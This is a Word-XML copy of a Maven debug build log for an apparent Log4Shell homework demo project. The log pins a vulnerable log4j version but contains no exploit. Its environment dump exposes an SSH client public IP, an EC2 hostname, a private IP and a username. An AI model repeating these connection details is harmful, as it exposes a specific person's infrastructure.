    <w:p w14:paraId="3E83220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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC2D9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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192EFB8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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73A6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org.apache.maven.shared:maven-shared-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D135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commons-io:commons-io:jar:2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52104E9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org.apache.maven.plugins:maven-clean-plugin:3.1.0:clean from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-clean-plugin:3.1.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A425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'org.apache.maven.plugins:maven-clean-plugin:3.1.0:clean' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724B92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directory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D2EB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excludeDefaultDirectories = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3641D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failOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42892F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followSymLinks = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE0D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outputDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93F5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reportDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3902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retryOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F114E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(f) skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0BB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testOutputDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5470A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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1572F89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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B749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Deleting file /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708287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Deleting file /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar.original</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A84C7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Deleting file /home/ec2-user/log4shell-homework/target/maven-archiver/pom.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6E2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Deleting directory /home/ec2-user/log4shell-homework/target/maven-archiver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444FEE0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Deleting directory /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C65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Skipping non-existing directory /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E89633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Skipping non-existing directory /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF88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Skipping non-existing directory /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041647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65C9FDB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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11162A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mirror maven-default-http-blocker (http://0.0.0.0/) for repository.jboss.org (http://repository.jboss.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6350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mirror maven-default-http-blocker (http://0.0.0.0/) for snapshots.jboss.org (http://snapshots.jboss.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F238D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mirror maven-default-http-blocker (http://0.0.0.0/) for oss.sonatype.org/jboss-snapshots (http://oss.sonatype.org/content/repositories/jboss-snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E805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mirror maven-default-http-blocker (http://0.0.0.0/) for codehaus.snapshots (http://snapshots.repository.codehaus.org).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39BC8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Dependency collection stats {ConflictMarker.analyzeTime=220242, ConflictMarker.markTime=130070, ConflictMarker.nodeCount=99, ConflictIdSorter.graphTime=115922, ConflictIdSorter.topsortTime=26599, ConflictIdSorter.conflictIdCount=35, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=11204378, ConflictResolver.conflictItemCount=85, DefaultDependencyCollector.collectTime=219527633, DefaultDependencyCollector.transformTime=11799587}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0190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org.apache.maven.plugins:maven-resources-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761757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org.apache.maven:maven-plugin-api:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877FA2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org.apache.maven:maven-artifact:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC50C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org.apache.maven:maven-core:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8426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org.apache.maven:maven-settings:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C904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org.apache.maven:maven-settings-builder:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD3B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org.apache.maven:maven-repository-metadata:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71735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org.apache.maven:maven-model-builder:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046203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org.apache.maven:maven-aether-provider:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2789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org.eclipse.aether:aether-spi:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD502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org.eclipse.aether:aether-impl:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BD65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org.eclipse.aether:aether-api:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED93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org.eclipse.aether:aether-util:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09345E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org.codehaus.plexus:plexus-utils:jar:3.0.10:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391721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org.codehaus.plexus:plexus-classworlds:jar:2.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477614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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800E9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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76013A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org.apache.maven:maven-model:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283CA28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org.codehaus.plexus:plexus-component-annotations:jar:2.0.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933F8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org.codehaus.plexus:plexus-interpolation:jar:1.26:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA557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org.eclipse.sisu:org.eclipse.sisu.plexus:jar:0.0.0.M2a:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E14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javax.enterprise:cdi-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A6EF9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javax.annotation:jsr250-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794143B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javax.inject:javax.inject:jar:1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF19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com.google.guava:guava:jar:10.0.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1008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com.google.code.findbugs:jsr305:jar:1.3.9:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65157C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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045863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aopalliance:aopalliance:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE3636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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M2a:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2769AD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asm:asm:jar:3.3.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4338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org.apache.maven.shared:maven-filtering:jar:3.2.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D44A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org.apache.maven.shared:maven-shared-utils:jar:3.3.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403FB5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org.sonatype.plexus:plexus-build-api:jar:0.0.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672BF6C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commons-io:commons-io:jar:2.6:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA789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org.apache.commons:commons-lang3:jar:3.8.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6244D0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Created new class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050BB8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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA805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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F93C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Populating class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A24C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org.apache.maven.plugins:maven-resources-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CEB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org.eclipse.aether:aether-util:jar:0.9.0.M2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E70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org.codehaus.plexus:plexus-utils:jar:3.0.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568C573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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA30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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793574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org.codehaus.plexus:plexus-component-annotations:jar:2.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3293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org.codehaus.plexus:plexus-interpolation:jar:1.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41DA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javax.enterprise:cdi-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F60D7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javax.annotation:jsr250-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013ECC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com.google.guava:guava:jar:10.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614012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com.google.code.findbugs:jsr305:jar:1.3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EDE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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255176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aopalliance:aopalliance:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41449C5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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M2a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002F20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asm:asm:jar:3.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF640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org.apache.maven.shared:maven-filtering:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405E6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org.apache.maven.shared:maven-shared-utils:jar:3.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3156BF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org.sonatype.plexus:plexus-build-api:jar:0.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F064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commons-io:commons-io:jar:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4116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org.apache.commons:commons-lang3:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3810BB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org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75045A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'org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432280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(f) addDefaultExcludes = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA31F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buildFilters = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E18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delimiters = [@]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D680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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01047A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escapeWindowsPaths = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF092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fileNameFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F4E2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includeEmptyDirs = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5EE7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outputDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BB42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overwrite = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F078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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755246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propertiesEncoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706B31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resources = [Resource {targetPath: null, filtering: true, FileSet {directory: /home/ec2-user/log4shell-homework/src/main/resources, PatternSet [includes: {**/application*.yml, **/application*.yaml, **/application*.properties}, excludes: {}]}}, Resource {targetPath: null, filtering: false, FileSet {directory: /home/ec2-user/log4shell-homework/src/main/resources, PatternSet [includes: {}, excludes: {**/application*.yml, **/application*.yaml, **/application*.properties}]}}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4AD9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session = org.apache.maven.execution.MavenSession@2dddc1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61802B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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1A71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supportMultiLineFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92B9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useBuildFilters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB89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useDefaultDelimiters = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4D2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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A479C5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[DEBUG] properties used {spring-integration.version=5.5.4, flyway.version=7.7.3, java.specification.version=17, webjars-hal-browser.version=3325375, java.vendor.url=https://aws.amazon.com/corretto/, sun.boot.library.path=/usr/lib/jvm/java-17-amazon-corretto.x86_64/lib, sun.java.command=org.codehaus.plexus.classworlds.launcher.Launcher clean package -X, jdk.debug=release, maven.version=3.8.4, javax-activation.version=1.2.0, kafka.version=2.7.1, jboss-transaction-spi.version=7.6.1.Final, java.vm.specification.vendor=Oracle Corporation, java.specification.name=Java Platform API Specification, byte-buddy.version=1.10.22, maven-install-plugin.version=2.5.2, env.which_declare=declare -f, java.runtime.version=17.0.15+6-LTS, httpclient5.version=5.0.4, env.SELINUX_ROLE_REQUESTED=, java.vendor.version=Corretto-17.0.15.6.1, env.HISTCONTROL=ignoredups, micrometer.version=1.7.4, rxjava-adapter.version=1.2.1, project.baseUri=file:/home/ec2-user/log4shell-homework/, hibernate.version=5.4.32.Final, java.io.tmpdir=/tmp, java.version=17.0.15, javax-persistence.version=2.2, jakarta-ws-rs.version=2.1.6, build-helper-maven-plugin.version=3.2.0, mockito.version=3.9.0, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>java.vm.specification.name=Java Virtual Machine Specification, infinispan.version=12.1.7.Final, nekohtml.version=1.9.22, maven-assembly-plugin.version=3.3.0, native.encoding=UTF-8, java.library.path=/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib, jakarta-servlet.version=4.0.4, java.vendor=Amazon.com Inc., java.specification.maintenance.version=1, thymeleaf-extras-java8time.version=3.0.4.RELEASE, undertow.version=2.2.10.Final, mariadb.version=2.7.4, selenium-htmlunit.version=2.49.1, thymeleaf-extras-data-attribute.version=2.0.1, ehcache3.version=3.9.6, jakarta-xml-bind.version=2.3.3, commons-dbcp2.version=2.8.0, env.LANG=C.UTF-8, mongodb.version=4.2.3, java.vm.specification.version=17, javax-transaction.version=1.3, maven.compiler.source=11, env.BASH_FUNC_which%%=() {  ( alias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0844E9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eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B259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user.home=/home/ec2-user, postgresql.version=42.2.23, reactive-streams.version=1.0.3, env.DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus, jmustache.version=1.15, querydsl.version=4.4.0, appengine-sdk.version=1.9.91, thymeleaf-layout-dialect.version=2.5.3, hamcrest.version=2.2, os.version=6.1.134-152.225.amzn2023.x86_64, commons-pool.version=1.6, jakarta-jms.version=2.0.3, jakarta-transaction.version=1.3.3, env.MAIL=/var/spool/mail/ec2-user, java.vm.name=OpenJDK 64-Bit Server VM, maven-help-plugin.version=3.2.0, mimepull.version=1.9.15, json-path.version=2.5.0, jaxen.version=1.2.0, johnzon.version=1.2.14, os.arch=amd64, spring-batch.version=4.3.3, couchbase-client.version=3.1.7, derby.version=10.14.2.0, javax-jsonb.version=1.0, rxjava2.version=2.2.21, javax-jaxws.version=2.3.1, json-smart.version=2.4.7, javax-websocket.version=1.1, commons-codec.version=1.15, caffeine.version=2.9.2, h2.version=1.4.200, env.JAVA_HOME=/usr/lib/jvm/java-17, java.vm.compressedOopsMode=32-bit, pooled-jms.version=1.2.2, unboundid-ldapsdk.version=4.0.14, thymeleaf-extras-springsecurity.version=3.0.4.RELEASE, javax-jaxb.version=2.3.1, sqlite-jdbc.version=3.34.0, jakarta-servlet-jsp-jstl.version=1.2.7, activemq.version=5.16.3, httpasyncclient.version=4.1.4, jtds.version=1.3.1, javax-jms.version=2.0.1, jakarta-websocket.version=1.1.2, env.LOGNAME=ec2-user, spring-security.version=5.5.2, hibernate-validator.version=6.2.0.Final, assertj.version=3.19.0, jakarta-xml-soap.version=1.4.2, influxdb-java.version=2.21, httpcore5.version=5.1.1, lombok.version=1.18.20, maven.compiler.target=11, jakarta-xml-ws.version=2.3.3, env.S_COLORS=auto, library.jansi.path=/usr/share/maven/lib/jansi-native, env.XDG_SESSION_CLASS=user, commons-pool2.version=2.9.0, jackson-bom.version=2.12.5, env.VIRTUAL_ENV=/home/ec2-user/log4shell-homework/venv, spring-retry.version=1.3.1, maven-invoker-plugin.version=3.2.2, maven-antrun-plugin.version=1.8, maven.conf=/usr/share/maven/conf, sun.java.launcher=SUN_STANDARD, resource.delimiter=@, javax-json.version=1.1.4, jboss-logging.version=3.4.2.Final, maven-resources-plugin.version=3.2.0, javax-validation.version=2.0.1.Final, netty.version=4.1.68.Final, jetty-jsp.version=2.2.0.v201112011158, maven-source-plugin.version=3.2.1, jetty.version=9.4.43.v20210629, rxjava.version=1.3.8, elasticsearch.version=7.12.1, java.runtime.name=OpenJDK Runtime Environment, env.XDG_SESSION_ID=8, rest-assured.version=4.3.3, env.SYSTEMD_COLORS=false, maven-deploy-plugin.version=2.8.2, env.MAVEN_CMD_LINE_ARGS= clean package -X, log4j2.version=2.14.1, maven-failsafe-plugin.version=2.22.2, spring-framework.version=5.3.10, dropwizard-metrics.version=4.1.25, git-commit-id-plugin.version=4.0.5, kotlin-coroutines.version=1.5.2, hazelcast-hibernate5.version=2.2.1, htmlunit.version=2.49.1, env.TERM=xterm-256color, sun.arch.data.model=64, spring-restdocs.version=2.0.5.RELEASE, freemarker.version=2.3.31, thymeleaf.version=3.0.12.RELEASE, jakarta-json.version=1.1.6, janino.version=3.1.6, maven-jar-plugin.version=3.2.0, maven-compiler-plugin.version=3.8.1, java.specification.vendor=Oracle Corporation, rabbit-amqp-client.version=5.12.0, java.version.date=2025-04-15, spring-amqp.version=2.3.10, java.home=/usr/lib/jvm/java-17-amazon-corretto.x86_64, maven-war-plugin.version=3.3.2, jolokia.version=1.6.2, sun.management.compiler=HotSpot 64-Bit Tiered Compilers, jetty-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>reactive-httpclient.version=1.1.10, env.PATH=/home/ec2-user/log4shell-homework/venv/bin:/home/ec2-user/.local/bin:/home/ec2-user/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin, maven-dependency-plugin.version=3.1.2, httpclient.version=4.5.13, env.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:, jsonassert.version=1.5.0, file.encoding=UTF-8, gson.version=2.8.8, sun-mail.version=1.6.7, jakarta-annotation.version=1.3.5, env.HOSTNAME=ip-172-31-46-85.us-east-2.compute.internal, env.SHLVL=1, mssql-jdbc.version=9.2.1.jre8, snakeyaml.version=1.28, okhttp3.version=3.14.9, liquibase.version=4.3.5, httpcore.version=4.4.14, lettuce.version=6.1.5.RELEASE, classworlds.conf=/usr/share/maven/bin/m2.conf, sun.io.unicode.encoding=UnicodeLittle, kotlin.version=1.5.31, wsdl4j.version=1.6.3, tomcat.version=9.0.53, sendgrid.version=4.7.5, env.SSH_CLIENT=76.141.92.20 44903 22, glassfish-jaxb.version=2.3.5, spring-ws.version=3.1.1, commons-lang3.version=3.12.0, os.name=Linux, junit.version=4.13.2, jetty-el.version=9.0.52, env.SELINUX_USE_CURRENT_RANGE=, db2-jdbc.version=11.5.6.0, maven.build.timestamp=2025-05-29T00:37:14Z, env.SSH_CONNECTION=76.141.92.20 44903 172.31.46.85 22, reactor-bom.version=2020.0.11, maven-enforcer-plugin.version=3.0.0, jstl.version=1.2, quartz.version=2.3.2, javax-money.version=1.1, spring-hateoas.version=1.3.4, path.separator=:, env.SHELL=/bin/bash, jakarta-validation.version=2.0.2, env.HISTSIZE=1000, maven.multiModuleProjectDirectory=/home/ec2-user/log4shell-homework, oracle-database.version=21.1.0.0, env.MAVEN_PROJECTBASEDIR=/home/ec2-user/log4shell-homework, java.vm.info=mixed mode, sharing, cassandra-driver.version=4.11.3, env.USER=ec2-user, java.class.version=61.0, xml-maven-plugin.version=1.0.2, sun.jnu.encoding=UTF-8, xmlunit2.version=2.8.2, jakarta-mail.version=1.6.7, slf4j.version=1.7.32, r2dbc-bom.version=Arabba-SR10, solr.version=8.8.2, saaj-impl.version=1.5.3, nimbus-jose-jwt.version=9.10.1, maven.build.version=Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5), hikaricp.version=4.0.3, maven.home=/usr/share/maven, netty-tcnative.version=2.0.43.Final, maven-shade-plugin.version=3.2.4, sun.stderr.encoding=UTF-8, jakarta-json-bind.version=1.0.2, file.separator=/, line.separator=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F7C0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sun.stdout.encoding=UTF-8, env.SSH_TTY=/dev/pts/0, spring-kafka.version=2.7.7, jersey.version=2.33, user.name=ec2-user, hazelcast.version=4.1.5, env.SELINUX_LEVEL_REQUESTED=, jdom2.version=2.0.6, atomikos.version=4.0.6, aspectj.version=1.9.7, hsqldb.version=2.5.2, ojdbc.version=19.3.0.0, env.XDG_RUNTIME_DIR=/run/user/1000, webjars-locator-core.version=0.46, project.reporting.outputEncoding=UTF-8, env.MOTD_SHOWN=pam, env.XDG_SESSION_TYPE=tty, oauth2-oidc-sdk.version=9.9.1, awaitility.version=4.0.3, env.OLDPWD=/home/ec2-user/log4shell-homework, env.PWD=/home/ec2-user/log4shell-homework, embedded-mongo.version=3.0.0, env.LESSOPEN=||/usr/bin/lesspipe.sh %s, spring-ldap.version=2.3.4.RELEASE, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>java.class.path=/usr/share/maven/boot/plexus-classworlds-2.6.0.jar, dependency-management-plugin.version=1.0.11.RELEASE, env.HOME=/home/ec2-user, java.vm.vendor=Amazon.com Inc., maven-javadoc-plugin.version=3.2.0, servlet-api.version=4.0.1, rsocket.version=1.1.1, jakarta-persistence.version=2.2.3, artemis.version=2.17.0, groovy.version=3.0.9, javax-cache.version=1.1.1, logback.version=1.2.6, prometheus-pushgateway.version=0.10.0, sun.cpu.endian=little, versions-maven-plugin.version=2.8.1, user.language=en, jedis.version=3.6.3, maven-clean-plugin.version=3.1.0, javax-mail.version=1.6.2, maven-surefire-plugin.version=2.22.2, javax-annotation.version=1.3.2, spring-data-bom.version=2021.0.5, mysql.version=8.0.26, classmate.version=1.5.1, jaybird.version=4.0.3.java8, antlr2.version=2.7.7, selenium.version=3.141.59, glassfish-el.version=3.0.4, project.build.sourceEncoding=UTF-8, jooq.version=3.14.15, java.vendor.url.bug=https://github.com/corretto/corretto-17/issues/, user.dir=/home/ec2-user/log4shell-homework, ehcache.version=2.10.9.2, junit-jupiter.version=5.7.2, java.vm.version=17.0.15+6-LTS, neo4j-java-driver.version=4.2.7, jakarta-activation.version=1.2.2, spring-session-bom.version=2021.0.2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414E6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40EA78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7E2F88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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008713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directory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59093B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excludes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E097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includes [**/application*.yml, **/application*.yaml, **/application*.properties]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE8BA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3040429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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4741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directory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4DA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excludes [**/application*.yml, **/application*.yaml, **/application*.properties]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6921BA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includes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0AD9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/home/ec2-user/log4shell-homework/src/main/resources</w:t>
